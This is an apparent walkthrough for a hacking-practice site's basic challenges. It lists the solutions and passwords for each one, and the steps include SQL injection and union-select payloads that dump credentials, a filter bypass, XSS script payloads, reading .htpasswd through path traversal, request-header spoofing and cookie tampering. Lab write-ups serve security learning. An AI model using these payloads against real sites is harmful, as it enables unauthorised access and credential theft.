the error message tells us there exists a folder called dontlookinhere
in there is a file
we can login using the credentials from the file
credentials are admin:rosebud101z
Starter 3 // Basic 3
the hint in the mission list says: "robots.txt"
by opening the robots.txt file we can see a directory /f0rk exists
in the directory a file exists
we can login usingthe credentials from the file
credentials are admin:f0rkblork
Javascript 1 // Basic 4
right click on the dropdown > inspect element
edit the select statement
add <option value="James">James</option>
click the Login button
Javascript 2 // Basic 5
inspect the source code
dont get baited by the fake password hax0r
enter the correct password skriptkid
Javascript 3 // Basic 6
inspect the source code
scroll all the way down past the newlines
find and enter the correct password Sauc3
Javascript 4 // Basic 7
inspect the source code
find and enter the correct password shifted
Javascript 5 // Basic 8
inspect the source code
decode the encoded password string
easy way is to simply enter unescape(pass) into the console while having the page open
enter the correct password ASCII-Chart
Spoofing 1 // Basic 16
Go to Network and "Edit and Resend" the "/basic/spoff/1/" request
add a X-Forwarded-For: to the Request Header and resend
Spoofing 2 // Basic 17
Go to Network and "Edit and Resend" the "/basic/spoff/2/" request
change the "User-Agent:" to EnigmaFox in the Request Header and resend
SQL 1 // Basic 21
True Injection 1' or 1=1 --
SQL 2 // Basic 22
The id parameter of the news page seems to be injectable
Trying to access id=AAA gives us the used select statement
First we are trying to figure out how many colums the database has id=1 order by 3-- and which ones can be displayed id=6 union select 1,2,3 from users --
To display the username and password we can use the injection id=6 union select 1,password,username from users --
The username is administrator and the password column contains 6537d34fd1c080b5cb7f06dde3a26fe8
the given password does not work, but using one of the many online hash databases we find its a md5 hash for bl1nd
logging in using administrator:bl1nd works
SQL 3 // Basic 23
This challenge is basically the same as SQL 2 // Basic 22
The only difference is the server prevents entries which contain union select
We can simply use union all select and bypass this check
To display the username and password we can use the injection id=6 union all select 1,password,username from users --
The username is administrator and the password column contains 6cfdca6f9633968c72a2a6e0fe2756ca
the given password does not work, but using one of the many online hash databases we find its a md5 hash for asdfgh
logging in using administrator:asdfgh works
URL Manipulation 1 // Basic 27
enter anything into the password form
the text reads Error finding a in password.php
the URL ends with index.php?file=login.php
open index.php?file=password.php
you get the password 3e0f84
Variable Manipulation 1 // Basic 30
we are given a hint the pages/ directory might exist
reading the home.txt file shows us how to use the page viewer
opening index.php?page=<filename> allows us to read any file
the admin directory path is protected by a HTTP auth
apache stores http auth credentials in .htpasswd
we can read the htpasswd by opening ?page=../admin/.htpasswd
we get the encoded password dXWxIS6i6irN6
the decoded password dog
Variable Manipulation 2 // Basic 31
opening the page instaltly redirects you to /index2.php
going back to / makes us land at /index2.php again
inspecting the HTML sent by the server for / we find the html comment <!-- 911_411.php -->
opening /911_411.php completes this challenge
Variable Manipulation 3 // Basic 32
XSS 1 // Basic 40
enter Test<script>alert('XSS')</script>
you are done
XSS 2 // Basic 41
Auditing Challenges
Auditing 1
Opening /index.php/AAAA results in Your form action is /basics/auditing/1//index.php/AAAA
The goal is to achieve XSS (no one tells you, but for some reason it use. You have to guess or something)
Opening index.php/"><script>alert(1)</script> completes the challenge
Auditing 2
We can set the "admin" cookie to 1 in the Storage -> Cookies and reload the site to get the points
Auditing 3
The code simply checks the access value in any of $_GET or $_POST
we can edit the value of the hidden input field setting it to admin
clicking on Refresh Page afterwards completes the challenge